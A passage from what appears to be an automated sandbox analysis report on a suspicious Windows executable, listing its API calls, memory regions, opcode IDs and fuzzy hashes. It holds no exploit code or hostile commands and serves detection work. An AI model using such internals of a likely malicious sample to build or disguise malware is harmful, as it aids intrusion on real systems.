                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                          • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                                                                          • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405C00 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405805,?,?,00000000,004059DB,?,?,?,?), ref: 00405C05
                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C19
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                                                          • Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004056FB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040570F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                          • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                                                                                          • Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                                                                                            • Part of subcall function 00405F97: wsprintfW.USER32 ref: 00405FA4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                                          • Opcode ID: 1f4eb151cda913b169ffb88545351cdbaf4989d3d31845bb092f08ab334f10a1
                                                                                                                                                                                                          • Instruction ID: 961aab187d6e804d52bb1e41e5d93eaf0119f522ae0a1b5a30e902dd9b89f162
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f4eb151cda913b169ffb88545351cdbaf4989d3d31845bb092f08ab334f10a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE04871601514EFDB01AF959E49DAF7769DB40328B14043BF501F00E1CA7D8C419E2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                          • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                          • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000470,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                          • Opcode ID: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                                                                                                                                                                          • Instruction ID: ed87ac6fe78c97b3ff6a715646c68139f6b7da630c9be1cec1260a384e7beadd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c78980a0f443f5658f5d159ba5a1d01dba279dc715946118e82bdfb2219104
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AE0E676154108BFDB01DFA5EE47FE977ECAB44704F048035BA08D7091C674F5508768
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405CD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                          • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                                                          • Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405CA8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                          • Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00403266
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                          • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                          • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocGlobal
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3761449716-0
                                                                                                                                                                                                          • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                          • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 004052EE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405398
                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                                                                                                                                            • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,?,00403F75), ref: 00404157
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004054C3
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008), ref: 004054EC
